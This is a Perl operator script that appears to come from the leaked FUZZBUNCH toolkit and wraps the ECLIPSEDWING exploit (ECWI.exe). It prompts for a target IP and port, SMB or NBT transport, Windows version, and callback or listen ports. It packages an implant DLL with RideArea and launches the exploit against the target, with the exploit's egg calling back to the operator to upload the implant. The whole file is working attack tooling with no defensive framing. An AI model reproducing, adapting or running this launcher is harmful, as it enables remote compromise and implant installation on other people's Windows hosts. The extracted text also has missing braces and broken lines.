2017-04-14 11:45:07 +02:00

1888 lines
68 KiB

# Project:
# File:
# Description:
# This file is the FUZZBUNCH wrapper script for ECLIPSEDWING
# Modifications:
# ---------------------------------------------------------------
# Don't allow any unsafe constructs
use strict;
use vars qw($VERSION);
print "\n\n$::VERSION\n\n";
# ---------------------------------------------------------------
# Useful packages
use FindBin; # finds root directory of script
use lib "$FindBin::Bin"; # look for other modules in the bin directory containing this one
use Getopt::Long; # long command line parsing
use Cwd; # current directory
# Obtain utilities & globals from Exploit package
use lib "$FindBin::Bin\\..\\..\\Resources\\Perl";
use ExploitUtils qw(
# ---------------------------------------------------------------
# Globals
# ---------------------------------------------------------------
# Parse command line.
# Need to remove excess args or else EU_GetInput will break
my %opts = ();
GetOptions(\%opts, "v", "h", "q|?", "b", "e=s", "f=s", "d=s", "t=s", "l=s", "c=s", "x=s", "n=s") or &print_script_usage(0);
if (scalar(@ARGV) > 0 ) {
&EU_Log(1, "Extraneous arguments found on command line: @ARGV");
&EU_Log(1, "Arguments will be ingnored");
while(@ARGV) {shift;}
if (!defined($opts{"e"})) {
&EU_Log(1, "A -e option must be supplied.");
if (!defined($opts{"f"})) {
&EU_Log(1, "A -f option must be supplied.");
if (!defined($opts{"x"})) {
&EU_Log(1, "A -x option must be supplied.");
if (!defined($opts{"l"})) {
&EU_Log(1, "A -l option must be supplied.");
if (!defined($opts{"n"})) {
&EU_Log(1, "A -n option must be supplied.");
# To Do: add any touch tools here
$::RIDEAREA = "Resources\\Tools\\ridearea2.exe"; # relative address to RIDEAREA2.exe
$::RPCTOUCHII = "Resources\\Tools\\rpc2.exe"; # used for RPCTOUCHII for probing Windows
$::LP_DLL = "$opts{l}"; # -l ListeningPostDll
$::PAYLOAD_DLL = "$opts{f}"; # dll payload
$::PAYLOAD_EXE = "$opts{x}"; # exe payload
$::PAYLOAD_EXE_NAME = "$opts{n}"; # exe drop file name
my $temp = $opts{e};
$::EXPLOIT_EXE = "$temp\\ECWI.exe"; # relative address to executable
$::EXPLOIT_CFG = "$temp\\ecwi.xml"; # our awesome trch config
# Egg socket use options
$::EGG_SOCKET_NONE = "1"; # Deliver the exploit and implant payloads together
$::EGG_SOCKET_NEW = "2"; # Egg will open a callback socket to upload Implant
$::EGG_SOCKET_REUSE = "3"; # Exploit socket will be used to upload Implant
# Implant socket use options
$::IMPLANT_SOCKET_NEW = "2"; # Egg will open a callback socket to upload Implant and for the follow on the operation
$::IMPLANT_SOCKET_MAINTAIN = "3"; # Exploit socket will be used to upload Implant and for the follow on the operation
# Run Options
# To Do: Add or remove RUN_PROBE_#s as needed
$::RUN_EXPLOIT = "1"; # Launch the exploit
$::RUN_PROBE_1 = "2"; # Launch Probe #1
$::RUN_PROBE_2 = "3"; # Launch Probe #2
$::RUN_PROBE_3 = "4";
# Exploit Versions
$::TARGET_VER_2K = 3;
$::TARGET_VER_2K3 = 5;
# OS Versions
$::OS_VER_2K3 = "Windows Server 2003";
$::OS_VER_XP = "Windows XP";
$::OS_VER_2K = "Windows 2000";
# Payload Options
# Global RPCTOUCHII run options
# Copied from the RPCTOUCHII_lib_interface.h file
my $work_dir = $opts{"d"} if (defined $opts{"d"});
my $root_dir = $opts{"c"} if (defined $opts{"c"});
my $TargetIpIn = $opts{"t"} if (defined $opts{"t"});
# ---------------------------------------------------------------
# DEPFILES contains files that must exist beneath root directory
# To Do: add any touch tools here, too
@DEPFILES = ($::RIDEAREA, $::EXPLOIT_EXE, $::RPCTOUCHII); # Use this one if using RpcTouchII tool
# ---------------------------------------------------------------
# Generic information
#my $work_dir = "E:\\"; # default working directory
#my $root_dir = "$FindBin::Bin\\..\\.."; # one level up from dir containing script
my $logfile_prefix = "ECWI_"; # prefix to prepend to logfile name
my $logfile_suffix = "_script.log"; # suffix to append to logfile name
my $filename_suffix = "_payload.bin"; # suffix to append to payload file name
# Common command line arguments
my $TargetIp = $TargetIpIn; # -i $TargetIp
my $TargetPort = 0; # -p $TargetPort
my $ImplantSocketStatus= $::IMPLANT_SOCKET_NEW; # -c $ImplantSocketStatus
my $TimeOutValue = 0; # -o $TimeOutValue
my $PayloadFile = ""; # Name of Payload File
my $PayloadType = ""; # DLL or EXE
my $PayloadDropName = "N/A"; # -n Payload drop filename
my $EggSocketStatus = $::EGG_SOCKET_REUSE; # -u $EggSocketStatus
my $EggCallbackIp = ""; # -I $EggCallbackIp.
my $EggCallbackPort = 0; # -P $EggCallbackPort.
my $ExternalRideArea = 0; #Call RideArea from the scrip external to the exploit library call
my $RA_Payload = "N/A";
my $TransProt_none =0;
my $TransProt_tcp =1;
my $TransProt_udp =2;
my $TargetTransportProtocol = $TransProt_none; # Target Network Protocol
my $TransportProtocol = "undefined";
my $Username = "NULL";
my $Password = "NULL";
my $NTHash = "00000000000000000000000000000000";
my $LMHash = "00000000000000000000000000000000";
my $callbackFlag =$::PAYLOAD_CALLBACK;
my $EggCallInPort = 0;
my $EggListenPort = 0;
my $CallinTimeoutValue = 60;
# Global Application protocol contants cooresponds to the AppProtocolType enumerated type on _lib_interface.h file
my $AppProt_none = 0;
my $AppProt_NA = 1;
my $AppProt_nbt = 2;
my $AppProt_smb = 3;
my $AppProt_smtp = 4;
my $AppProt_pop = 5;
my $AppProt_http = 6;
my $AppProt_ftp = 7;
my $AppProt_telnet = 8;
my $AppProt_imap = 9;
my $TargetApplicationProtocol = $AppProt_none; # Target Application Protocol
my $ApplicationProtocol = "undefined";
my $RpcConnection = ""; # RPC connection flag
# "-rpc" if using an RPC connection
# Global OS versions
my $not = "NOT GOOD";
my $w9x = "Windows 9x";
my $nt4 = "Windows NT 4.0";
my $w2k = "Windows 2000";
my $w2ksp0123 = "Windows 2000 Service Pack 0, 1, 2, or 3";
my $w2ksp4 = "Windows 2000 Service Pack 4";
my $wxp = "Windows XP";
my $wxpsp0 = "Windows XP Service Pack 0";
my $wxpsp1 = "Windows XP Service Pack 1";
my $wxpsp2 = "Windows XP Service Pack 2";
my $wxpsp3 = "Windows XP Service Pack 3";
my $w2kXp = "Windows 2000 XP" ;
my $wxp2003 = "Windows XP Server 2003" ;
my $ws2003 = "Windows Server 2003";
my $ws2003sp0 = "Windows Server 2003 Service Pack 0";
my $ws2003sp1 = "Windows Server 2003 Service Pack 1";
my $ws2003sp2 = "Windows Server 2003 Service Pack 2";
# Exploit specific command line arguments
# To Do: enter list of variables
my $WindowsVersion = 0; # -w $WindowsVersion
my $TargetServerIp = "$TargetIpIn"; # -h $TargetServerIp
&print_usage(1) if (defined $opts{"h"}); # we're done if -h supplied
&print_usage(0) if (defined $opts{"q"}); # we're done if -? supplied
$ExploitUtils::EU_VERBOSE = 1 if (defined $opts{"v"}); # turn on verbose mode
$ExploitUtils::EU_BATCHMODE = 1 if (defined $opts{"b"}); # turn on batch mode
# ---------------------------------------------------------------
# Ensure that we're on the right architecture
# ---------------------------------------------------------------
if ($ENV{"OS"} ne "Windows_NT") {
&EU_ExitMessage(1,"This script requires Windows NT or Windows 2000");
# ---------------------------------------------------------------
# Obtain working directory
# We need this as early as possible so that we can begin doing logging.
# (Don't prompt the user if the option was supplied on the command line.)
# ---------------------------------------------------------------
$work_dir = &EU_GetExistingDir("Enter pathname for operation's working directory", $work_dir, 1);
$root_dir = &EU_GetRootDir($root_dir,@::DEPFILES);
# ---------------------------------------------------------------
# Set up log file
# ---------------------------------------------------------------
&EU_LogInit($logfile_prefix, $logfile_suffix, $work_dir);
# ---------------------------------------------------------------
# Change to Working Directory
# ---------------------------------------------------------------
&EU_Log(0,"\nChanging to working directory: $work_dir");
chdir $work_dir || &EU_ExitMessage(1,"Unable to change to working directory: $work_dir");
# ---------------------------------------------------------------
# Validate parameters.
# To Do: prompt the user for any and all necessary arguments
# within the validate_params() function
# ---------------------------------------------------------------
($TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName, $TimeOutValue,
$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
$EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
$WindowsVersion, $TargetServerIp, $Username, $Password, $NTHash, $LMHash, $callbackFlag, $EggListenPort, $EggCallInPort, $CallinTimeoutValue) =
&validate_parms($work_dir, $root_dir, $TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus, $PayloadFile, $PayloadType, $PayloadDropName,
$TimeOutValue, $TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
$EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
$WindowsVersion, $TargetServerIp, $Username, $Password, $NTHash, $LMHash, $callbackFlag, $EggListenPort, $EggCallInPort, $CallinTimeoutValue);
# ---------------------------------------------------------------
# Map the version name for the OS/Service Pack combo to the
# name used in the Truantchild XML.
# ---------------------------------------------------------------
if($WindowsVersion eq $wxpsp2){ $WindowsVersion = "XPSP2"; }
elsif($WindowsVersion eq $wxpsp3){ $WindowsVersion = "XPSP3"; }
#elsif($WindowsVersion eq $ws2003sp0){ $WindowsVersion = "W2K3SP0"; }
elsif($WindowsVersion eq $ws2003sp1){ $WindowsVersion = "W2K3SP1"; }
elsif($WindowsVersion eq $ws2003sp2){ $WindowsVersion = "W2K3SP2"; }
elsif($WindowsVersion eq $w2ksp4){ $WindowsVersion = "W2KSP4"; }
# ---------------------------------------------------------------
# Prompt user to launch executable
# ---------------------------------------------------------------
my $answer;
$answer = &EU_GetInput("\nReady to begin exploit ([y],n,quit)? ", "y");
&EU_Log(0,"\nReady to begin exploit ([y],n,quit)? $answer");
&EU_ExitMessage(0,"User terminated script") if ($answer ne "y" and $answer ne "Y");
# ---------------------------------------------------------------
# Invoke RIDEAREA only if External RideArea flag has been set by the operator
# ---------------------------------------------------------------
if ($ExternalRideArea == 1) {
# ---------------------------------------------------------------
# Create Unique File Name for RideArea Payload
my $payload_name_format = "${work_dir}\\${logfile_prefix}%04d%02d%02d_%02d%02d%02d${filename_suffix}";
my ($sec, $min, $hour, $mday, $mon, $year, $wday, $yday, $isdst) = gmtime(time);
$year += 1900;
$mon += 1;
$RA_Payload = sprintf($payload_name_format,$year,$mon,$mday,$hour,$min,$sec);
# Invoke RideArea
# FunctionOrdinal == 17, FunctionArgument == 8, ThreadOption == Multi, LoadOption == Memory
# Check to see if exe type payload. i.e. valid PayloadDropName
if ($PayloadDropName eq "N/A") {
if ($PayloadType eq "d") {
&EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
&EU_Log(0, "\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
else {
&EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m");
&EU_Log(0, "\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -o \"$RA_Payload\" -f 17 -a 8 -t m");
else {
if ($PayloadType eq "d") {
&EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
&EU_Log(0, "\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m -l m");
else {
&EU_RunCommand("\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m");
&EU_Log(0, "\"$root_dir\\$::RIDEAREA\" -i \"$PayloadFile\" -x $PayloadType -d $PayloadDropName -o \"$RA_Payload\" -f 17 -a 8 -t m");
# The internal RideArea is not support for this exploit. If it has been
# previously selected, we bail here.
print "Internal RideArea not supported for this op.";
&EU_ExitMessage(0, "\nFailure to invoke with correct RideArea.");
# ---------------------------------------------------------------
# Invoke Exploit
# ---------------------------------------------------------------
my $flags;
if($ExploitUtils::EU_VERBOSE) { $flags = "-v"; }
else { $flags = ""; }
&EU_Log(1,"\nExploit will launch in a separate window. Follow the status messages");
&EU_Log(1,"in the new window to determine if it succeeds.");
&EU_Log(1,"\nLaunching exploit...");
my $ImplantPayload = "N/A";
if ($ExternalRideArea == 1) {
$ImplantPayload = $RA_Payload;
#else {
# $ImplantPayload = $PayloadFile;
if ($ExternalRideArea == 1) {
# &EU_RunCommand("start \"ECWI Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp
# -p $TargetPort
# -u $EggSocketStatus
# -c $ImplantSocketStatus
# -I $EggCallbackIp
# -P $EggCallbackPort
# -f \"$ImplantPayload\"
# -l \"$root_dir\\$::LP_DLL\"
# -z
# -o $TimeOutValue
# -t $TargetTransportProtocol
# -b $TargetApplicationProtocol $RpcConnection
# -w $WindowsVersion
# -h $TargetServerIp
# -U $Username
# -W $Password
# -N $NTHash
# -L $LMHash\"");
my $TrchConfig = $root_dir."\\".$::EXPLOIT_CFG;
if( $callbackFlag eq $::PAYLOAD_LISTEN) {
&EU_RunCommand("start \"ECWI\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" --InConfig \"$TrchConfig\" --TargetIp $TargetIp --TargetPort $TargetPort --Protocol $ApplicationProtocol --Payload Listener --ListenPort $EggListenPort --CallinPort $EggCallInPort --CallinTimeout $CallinTimeoutValue --Target $WindowsVersion --RunMode Standalone --RideArea $RA_Payload --LPFileName \"$root_dir\\$::LP_DLL\"\"");
else {
&EU_RunCommand("start \"ECWI\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" --InConfig \"$TrchConfig\" --TargetIp $TargetIp --TargetPort $TargetPort --Protocol $ApplicationProtocol --Payload Callback --CallbackIp $EggCallbackIp --CallbackPort $EggCallbackPort --Target $WindowsVersion --RunMode Standalone --RideArea $RA_Payload --LPFileName \"$root_dir\\$::LP_DLL\"\"");
#else {
# if ($PayloadDropName eq "N/A") {
# &EU_RunCommand("start \"ECWI Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -x $PayloadType -l \"$root_dir\\$::LP_DLL\" -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp -U $Username -W $Password -N $NTHash -L $LMHash\"");
# }
# else {
# &EU_RunCommand("start \"ECWI Exploit\" cmd /T:9F /K \"\"$root_dir\\$::EXPLOIT_EXE\" -r $::RUN_EXPLOIT -i $TargetIp -p $TargetPort -u $EggSocketStatus -c $ImplantSocketStatus -I $EggCallbackIp -P $EggCallbackPort -f \"$ImplantPayload\" -x $PayloadType -q $PayloadDropName -l \"$root_dir\\$::LP_DLL\" -o $TimeOutValue -t $TargetTransportProtocol -b $TargetApplicationProtocol $RpcConnection -w $WindowsVersion -h $TargetServerIp -U $Username -W $Password -N $NTHash -L $LMHash\"");
# }
# ---------------------------------------------------------------
# Done.
# ---------------------------------------------------------------
my $cur_dir = cwd();
chdir $cur_dir || &EU_ExitMessage(1,"Unable to switch back to initial directory: $cur_dir");
&EU_ExitMessage(0,"\nDone with $::0.");
# P R I N T _ U S A G E
# Output usage information and exit.
# Parameters:
# $_[0] = full help flag, i.e. if non-zero then display complete usage
# print usage message
sub print_usage() {
my ($verbose) = @_;
print "$::VERSION\n";
print qq~
Usage: $::0 [-v] [-h] [-?] [-b]
[-d <working directory>] [-e <exploits directory>]
[-t <target IP>] [-l <lp dll>]
[-f <payload dll>]
[-x <payload exe> [-n <Payload Dropname>]]
if ($verbose) {
print qq~
-v verbose mode. Default non-verbose mode.
-h Print this help information.
-? Print abbreviated help information.
-b Batch (non-interactive) mode. Default interactive mode.
-d <working directory> Working Directory
Top-level directory where operation's files will be
generated. Default E:\.
-e <exploits directory> Exploits Directory
Top-level directory containing exploit files.
Default one directory up from directory containing this script.
-t <target IP> Target IP address.
Default derived as last part of working directory name.
-l <lp dll> Filename of the listening post dll.
-f <payload dll> Filename of the implant payload (dll).
-x <payload exe> Filename of the implant payload (exe).
-n <payload dropname> Filename to be used for the dropped executable
&EU_ExitMessage(1,"End of help.");
# V A L I D A T E _ P A R M S
# *** NOTE: this routine is exploit specific
# Parameters:
# $_[0] = $work_dir
# $_[1] = $root_dir
# $_[2] = $TargetIp
# $_[3] = $TargetPort
# $_[4] = $EggSocketStatus
# $_[5] = $ImplantSocketStatus
# $_[6] = $PayloadFile
# $_[7] = $PayloadType
# $_[8] = $PayloadDropName
# $_[9] = $TimeOutValue
# $_[A] = $TargetTransportProtocol
# $_[B] = $TargetApplicationProtocol
# $_[C] = $RpcConnection
# $_[D] = $EggCallbackIp
# $_[E] = $EggCallbackPort
# $_[F] = $ExternalRideArea
# $_[10] = $WindowsVersion
# $_[11] = $TargetServerIp
# $_[12] = $Username
# $_[13] = $Password
# $_[14] = $NTHash
# $_[15] = $LMHash
# $_[16] = $callbackFlag
# $_[17] = $EggListenPort
# $_[18] = $EggCallInPort
# To Do: Add exploit specific params to the list
# Returns:
# array of values to replace supplied input parameters
# *** Note: may exit via call to &EU_GetInput or batch mode failure.
# Globals:
# $ExploitUtils::EU_LOGFILE
# $ExploitUtils::EU_BATCHMODE
# $ExploitUtils::EU_VERBOSE
# Program will attempt to obtain appropriate values for each of the
# specified input parameters (other than $work_dir).
sub validate_parms()
my ($work_dir, $root_dir, $TargetIp, $TargetPort, $EggSocketStatus, $ImplantSocketStatus,
$PayloadFile, $PayloadType, $PayloadDropName,
$TimeOutValue,$TargetTransportProtocol, $TargetApplicationProtocol, $RpcConnection,
$EggCallbackIp, $EggCallbackPort, $ExternalRideArea,
$WindowsVersion, $TargetServerIp, $Username, $Password, $NTHash, $LMHash, $callbackFlag, $EggCallInPort, $CallinTimeoutValue, $Call) = @_;
# Common local variables
my ($continue, $retcode, $vol, $dir);
my ($redirectFlag);
my $OrgTargetIp = $TargetIp;
my $LPRedirectionIp = "";
my $LPRedirectionPort = "undefined";
my $DestinationIp = $TargetIp;
my $DestinationPort = "undefined";
my $TransportProtocolSelected = 0;
my $RideAreaOpt = "Exploit called";
my $UsingPassword = 0;
my ($LocalIp);
my $RpcTouchProtocol = "undefined";
my $touch = $::RUN_PROBE_1;
my $bVulnerable = 0;
my $bError = 0;
# Get the Local IP Address
$LocalIp = &EU_GetLocalIP("Enter the local IP Address", $LocalIp);
&EU_Log(0, "Enter the local IP Address: $LocalIp");
while (1)
# To Do: prompt user for add any additional arguments as necessary
# ---------------------------------------------------------------
# Acquire Implant Type
# ---------------------------------------------------------------
&EU_Log(1,"\nSelect Payload file to send:\n");
&EU_Log(1," 0) $::PAYLOAD_DLL");
# EXE payloads not supported.
#&EU_Log(1," 1) $::PAYLOAD_EXE ($::PAYLOAD_EXE_NAME) (not supported)");
$retcode = &EU_GetInput("\nEnter selection [0]: ", "0");
&EU_Log(0, "\nEnter selection [0]: $retcode");
if($retcode eq "0")
&EU_Log(1,"\nUsing Payload file $::PAYLOAD_DLL\n");
$PayloadFile = $::PAYLOAD_DLL;
$PayloadType = "d";
$PayloadDropName = "N/A";
# EXE payloads not supported.
#elsif($retcode eq "1")
# &EU_Log(1,"\nUsing Payload file $::PAYLOAD_EXE\n");
# $PayloadFile = $::PAYLOAD_EXE;
# $PayloadType = "e";
# $PayloadDropName = $::PAYLOAD_EXE_NAME;
&EU_Log(1, "Invalid option. Try again or enter 'quit'.");
} # while(1) payload selection
# ---------------------------------------------------------------
# Acquire RideArea option
# ---------------------------------------------------------------
&EU_Log(1,"\nRideArea option:\n");
&EU_Log(1," Script will call external RideArea - Must have DEP support");
$RideAreaOpt = "Script called";
$ExternalRideArea = 1;
# ---------------------------------------------------------------
# Get Network Target Network Protocol
# ---------------------------------------------------------------
&EU_Log(1,"\nSelect the Transport Protocol Sequence To Use:\n");
&EU_Log(1," 1) NBT/Named Pipe (TCP Port 139 is accessible)");
&EU_Log(1," 2) SMB/Named Pipe (TCP Port 445 is accessible)");
#&EU_Log(1," 3) TCP/IP Ephemeral Port (Ephemeral TCP Port is accessible)");
#&EU_Log(1," 4) UDP/IP (UDP Port 135 is accessible)");
$TransportProtocolSelected = &EU_GetInput("\nEnter selection [2]: ", "2");
&EU_Log(0, "\nEnter selection [2]: $TransportProtocolSelected");
if ($TransportProtocolSelected eq "1")
$TargetTransportProtocol = $TransProt_tcp;
$TransportProtocol = "tcp";
$TargetApplicationProtocol = $AppProt_nbt;
$ApplicationProtocol = "nbt";
$RpcConnection = "-rpc";
$RpcTouchProtocol = "rpc_nbt";
$DestinationPort = 139;
elsif($TransportProtocolSelected eq "2") {
$TargetTransportProtocol = $TransProt_tcp;
$TransportProtocol = "tcp";
$TargetApplicationProtocol = $AppProt_smb;
$ApplicationProtocol = "smb";
$RpcConnection = "-rpc";
$RpcTouchProtocol = "rpc_smb";
$DestinationPort = 445;
# elsif($TransportProtocolSelected eq "3") {
# $TargetTransportProtocol = $TransProt_tcp;
# $TransportProtocol = "tcp";
# $TargetApplicationProtocol = $AppProt_NA;
# $ApplicationProtocol = "NA";
# $RpcConnection = "-rpc";
# $RpcTouchProtocol = "rpc_tcp";
# $DestinationPort = 135;
# $touch = $::RUN_PROBE_2;
# }
# elsif($TransportProtocolSelected eq "4") {
# $TargetTransportProtocol = $TransProt_udp;
# $TransportProtocol = "udp";
# $TargetApplicationProtocol = $AppProt_NA;
# $ApplicationProtocol = "NA";
# $RpcConnection = "-rpc";
# $RpcTouchProtocol = "rpc_udp";
# $DestinationPort = 135;
# }
else {
&EU_Log(1, "Invalid option. Try again or enter 'quit'.");
} ### while(1) Network Target Network Protocol selection
# ---------------------------------------------------------------
# Acquire Username/Password option
# ---------------------------------------------------------------
# &EU_Log(1,"\nUsername/Password option:\n");
# &EU_Log(1," 0) Use anonymous access (No username or password)[DEFAULT]");
# &EU_Log(1," 1) Supply a username and password (Only needed if anon. access is denied)");
# &EU_Log(1," 2) Supply a username and NTLM and LANMAN password hash (Only needed if anon. access is denied)");
# while(1)
# {
# $UsingPassword = &EU_GetInput("\nEnter selection [$UsingPassword]: ", $UsingPassword);
# &EU_Log(0, "\nEnter selection [$UsingPassword]: $UsingPassword");
# if($UsingPassword eq "0")
# {
# ; # Nothing to do
# }
# elsif($UsingPassword eq "1")
# {
# $Username = &EU_GetInput("\nEnter Username[$Username]: ", $Username);
# &EU_Log(0, "\nEnter Username[NULL]: $Username");
# $Password = &EU_GetInput("\nEnter Password [$Password]: ", $Password);
# &EU_Log(0, "\nEnter Password [NULL]: $Password");
# }
# elsif($UsingPassword eq "2")
# {
# $Username = &EU_GetInput("\nEnter Username[$Username]: ", $Username);
# &EU_Log(0, "\nEnter Username[NULL]: $Username");
# $NTHash = &EU_GetInput("\nEnter NTLM password hash [$NTHash]: ", $NTHash);
# &EU_Log(0, "\nEnter NTLM password hash [$NTHash]: $NTHash");
# $LMHash = &EU_GetInput("\nEnter LANMAN password hash [$LMHash]: ", $LMHash);
# &EU_Log(0, "\nEnter LANMAN password hash [$LMHash]: $LMHash");
# ##In order for the TIPPYBELCH library to work properly we must set a fake password.
# $Password = "FakePassword";
# }
# else
# {
# &EU_Log(1, "Invalid option. Try again or enter 'quit'.");
# next;
# }
# last;
# } # while(1) payload selection
# ---------------------------------------------------------------
# Prompt for REDIRECTION
# ---------------------------------------------------------------
$retcode = &EU_GetInput("\nWill this operation be REDIRECTED ([y],n)? ", "y");
&EU_Log(0, "\nWill this operation be REDIRECTED ([y],n)? $retcode");
if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") )
$redirectFlag = 1;
$redirectFlag = 0;
# ---------------------------------------------------------------
# ---------------------------------------------------------------
if( $redirectFlag == 0 )
# ---------------------------------------------------------------
# Get Target IP Address and Port (to which to deliver the exploit)
# Use Actual Target's IP Address
# ---------------------------------------------------------------
$EggCallbackIp = $LocalIp;
$TargetIp = $OrgTargetIp; #if loop back after setting redirection, TargetIp needs to be reset
$TargetIp = &EU_GetIP("\nEnter the target IP Address", $TargetIp);
&EU_Log(0, "Enter the target IP Address: $TargetIp");
$DestinationIp = $TargetIp;
$DestinationPort = &EU_GetPort("\nEnter the target Port", $DestinationPort);
&EU_Log(0, "Enter the target Port: $DestinationPort");
$TargetPort = $DestinationPort;
$TargetServerIp = $TargetIp;
# ---------------------------------------------------------------
# Get Payload Type
# ---------------------------------------------------------------
$callbackFlag = &get_payload_type($callbackFlag);
# ---------------------------------------------------------------
# ---------------------------------------------------------------
if( $callbackFlag eq $::PAYLOAD_LISTEN)
($ImplantSocketStatus, $EggSocketStatus) = &get_socket_options($ImplantSocketStatus, $EggSocketStatus,
# Prompt for Egg Listen Port
$EggListenPort = &EU_GetPort("\nEnter the Listen Port", $EggListenPort);
&EU_Log(0, "Enter the Egg listen Port: $EggListenPort");
if($EggListenPort eq "0")
&EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
} # while(1) payload selection
# Prompt for Egg Call In Port
$EggCallInPort = &EU_GetPort("\nEnter the Call In Port", $EggCallInPort);
&EU_Log(0, "Enter the Egg call In Port: $EggCallInPort");
if($EggCallInPort eq "0")
&EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
} # while(1) payload selection
# ---------------------------------------------------------------
# Prompt for socket time-out value
# ---------------------------------------------------------------
&EU_Log(1, "\nThe default time-out value before the CALL IN connection is made is 60 sec.");
&EU_Log(1, "(You may want to increase this value if the network is exceptionally slow.)");
$retcode = &EU_GetInput("Use default value of 60 sec ([y],n)? ", "y");
&EU_Log(0, "Use default value of 60 sec ([y],n)? $retcode");
if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") or ($retcode eq "60") ) {
$CallinTimeoutValue = "60";
else {
$CallinTimeoutValue = &EU_GetInput("Enter new time-out value (greater than 60): ");
&EU_Log(0, "Enter new time-out value (greater than 60): $CallinTimeoutValue");
} # End payload Listen
# ---------------------------------------------------------------
# ---------------------------------------------------------------
# ---------------------------------------------------------------
# Get Call-Back Socket Options
# ---------------------------------------------------------------
($ImplantSocketStatus, $EggSocketStatus) = &get_socket_options($ImplantSocketStatus, $EggSocketStatus,
if( $EggSocketStatus eq $::EGG_SOCKET_NEW)
# ---------------------------------------------------------------
# Get Egg Callback IP Address and Port
# ---------------------------------------------------------------
&EU_Log(1, "\nThe ECWI Exploit Payload must callback in order to upload the Implant Payload.");
# Use Local IP for Egg Callback
&EU_Log(1, "The local IP Address should be used as the Egg callback IP Address.");
$EggCallbackIp = &EU_GetLocalIP("\nEnter the Egg callback IP Address", $LocalIp);
&EU_Log(0, "Enter the Egg callback IP Address: $EggCallbackIp");
# Prompt for Egg Callback Port
$EggCallbackPort = $DestinationPort * 10 + 1;
$EggCallbackPort = &EU_GetPort("\nEnter the Egg callback Port", $EggCallbackPort);
&EU_Log(0, "Enter the Egg callback Port: $EggCallbackPort");
if($EggCallbackPort eq "0")
&EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
} # while(1) payload selection
} #End callback Listen
} # End payload Callback
} # End redirection False
# ---------------------------------------------------------------
# ---------------------------------------------------------------
# ---------------------------------------------------------------
# Get Redirection IP Address and Port (to which to deliver the exploit)
# Use Loopback IP Address
# ---------------------------------------------------------------
$LPRedirectionIp = &EU_GetIP("\nEnter the LP Redirection IP address", $LPRedirectionIp);
&EU_Log(0, "Enter the LP Redirection IP address: $LPRedirectionIp");
$TargetIp = $LPRedirectionIp;
$LPRedirectionPort = $DestinationPort * 10;
# Get the Redirector Port
&EU_Log(1, "\nECWI must be re-directed to the Target on port $DestinationPort");
$LPRedirectionPort = &EU_GetPort("Enter the LP Redirection Port No.", $LPRedirectionPort);
&EU_Log(0,"Enter the LP Redirection Port No.: $LPRedirectionPort");
# Get NBT Server IP Address
$TargetServerIp = &EU_GetIP("\nEnter the Server's IP address (AKA: the Actual Target's IP Address)", $DestinationIp);
&EU_Log(0,"Enter the Server's IP address: $TargetServerIp");
$TargetPort = $LPRedirectionPort;
# ---------------------------------------------------------------
# Get Payload Type
# ---------------------------------------------------------------
$callbackFlag = &get_payload_type($callbackFlag);
# ---------------------------------------------------------------
# ---------------------------------------------------------------
if( $callbackFlag eq $::PAYLOAD_LISTEN)
# Prompt for Egg Listen Port
$EggListenPort = &EU_GetPort("\nEnter the Listen Port", $EggListenPort);
&EU_Log(0, "Enter the Listen Port: $EggListenPort");
if($EggListenPort eq "0")
&EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
} # while(1) payload selection
# Prompt for Egg Call In Port
$EggCallInPort = &EU_GetPort("\nEnter the Call In Port", $EggCallInPort);
&EU_Log(0, "Enter the Call In Port: $EggCallInPort");
if($EggCallInPort eq "0")
&EU_Log(1, "Invalid Port number. Try again or enter 'quit'.");
} # while(1) payload selection
# ---------------------------------------------------------------
# Prompt for socket time-out value
# ---------------------------------------------------------------
&EU_Log(1, "\nThe default time-out value before the CALL IN connection is made is 60 sec.");
&EU_Log(1, "(You may want to increase this value if the network is exceptionally slow.)");
$retcode = &EU_GetInput("Use default value of 60 sec ([y],n)? ", "y");
&EU_Log(0, "Use default value of 60 sec ([y],n)? $retcode");
if( ($retcode eq "y") or ($retcode eq "yes") or ($retcode eq "Y") or ($retcode eq "YES") or ($retcode eq "60") ) {
$CallinTimeoutValue = "60";
else {
$CallinTimeoutValue = &EU_GetInput("Enter new time-out value (greater than 60): ");
&EU_Log(0, "Enter new time-out value (greater than 60): $CallinTimeoutValue");
} # End payload Listen
